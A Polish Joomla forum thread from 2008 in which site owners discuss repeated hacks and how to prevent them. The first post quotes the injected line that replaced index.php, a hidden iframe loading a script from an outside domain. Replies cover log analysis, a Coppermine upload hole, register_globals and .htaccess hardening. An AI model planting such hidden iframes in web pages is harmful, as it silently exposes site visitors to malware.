Znowu włamanie

**orion000** · 10-04-2008, 21:32

Witam!
zamiast pliku index.php umieszczono inny o zawartości:

<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></i frame>

To już kolejny raz, tylko striona inna i serwer inny.

Czy ktoś mi podpowie jak tego dokonują hackerzy i jak się przed tym zabezpieczyć?

**inkos** · 10-04-2008, 21:39

Poczytaj wątki w tym dziale forum a z pewnościa dowiesz się więcej na ten temat czyli co może być powodem takich "wizyt" i jak temu zapobiec.

Oczywiscie Twoj problem moze byc troche bardziej zlozony wiec po lekturze regulaminu uzupelnij swojego posta o mozliwie jaknajwiecej informacji potrzebnych do zdiagnozowania problemu.

**stasio** · 10-04-2008, 21:40

witam borykam sie z czymś podobnym
mam w każdym pliku php i html na końcu taka linijkę, u mnie włam był raczej przez zomm galery szukam łaty na 2.5.4 rc4

**orion000** · 10-04-2008, 21:46

U mnie włamy zdarzyły się zarówno na Joomli 1.0.11 (wiem, że czas ją zaktualizować_ jak i na joomli 1.0.13 IE utf. Strony chodzą na róznych serwerach (choć jak dotąd wszystkie to apache). Mam zainstalowane różne komponenty i moduły, które raczej się nie powtarzają. Co za licho?

**crazyluki** · 10-04-2008, 21:51

a u mnie pod blokiem zdarzyło się włamanie. jak się zabezpieczyć i kto mi się włamał? włamania - temat rzeka. Niestety, ciężko jest przypadki uogólniać. Każdy przypadek można, a nawet trzeba rozpatrywać indywidualnie. Jakie komponenty ?
i dlaczego narzekasz na 1.0.11 że są włamy skoro wiesz że trzeba zaktualizować?

**stasio** · 10-04-2008, 21:53

heheh no właśnie , ja siedzie i śledzę logi serwera i daty zmiany plików...
ale im bardzije patrze w te logi tym mniej widze... i juz sam sie zastanawiam czego szukać w nich

**inkos** · 11-04-2008, 00:08

Wysłane przez stasio

i juz sam sie zastanawiam czego szukać w nich

Czegoś co poda informację iż np. plik index.php z katalogu głównego Twojej Joomla został zmodyfikowany o tej i tej godzinie (masz taką info nawet w zwyklym Total commanderze +/- czasami time zone servera). W logach szukasz kto czyli jakie IP dokonalo tej zmiany. Jak nie wiesz a masz porzadny serwer - napisz do admina -> pomoze okreslic co i jak.

Z taką wiedzą podejmujesz stosowne kroki aby zapobiec ponownym atakom. Co i jak było już omawiane w tej kategorii na forum.

**nexus246** · 11-04-2008, 09:00

Te skrypty co podmieniają pliki to automaty, wyłącz register globals, dodaj odpowiednie wpisy do htaccess (poszukaj sobie tutaj albo na joomla.org) i będzie spokój.

**stasio** · 11-04-2008, 12:18

dobra... teraz wam powiem śledztwo doprowadziło mnie co się stało
o 22:44:41 z Ukrainy zostało wysłane zapytanie do pliku upload.php wgrany plik zip z kodem i trach do 23:08 nie było nic a (o przepraszam napisałem to głośno? to z nerwów) okazało sie ze dziura była w coppermine

wiec szczęśliwym zwycięzcą konkursu na wpuszczenie wirusa okazał sie skrypt galerii , jommla nie miała z tym za wiele wspołnego :|
jak ktoś ma coppera niech aktualizuje i poprawia go bo dzięki na...kicham na takie kłopoty :-) teraz sobie siedzę i z backupu przenoszę pliki

wole to niż poprawianie wszystkich plików

**orion000** · 11-04-2008, 12:24

Ja nie mam coppermine. Za to wszędzie mam jce więc może to przez niego. Dziś wgrałem do niego łatkę. Sprawdziłem i powyłączałem register globals tam gdzie było włączone. Uzupełniłem htaccess wszystkim co znalazłem na forum. I chyba pozostaje czekać i patrzeć

Temat: Znowu włamanie

Przybornik

Widok

Znowu włamanie

Reguły pisania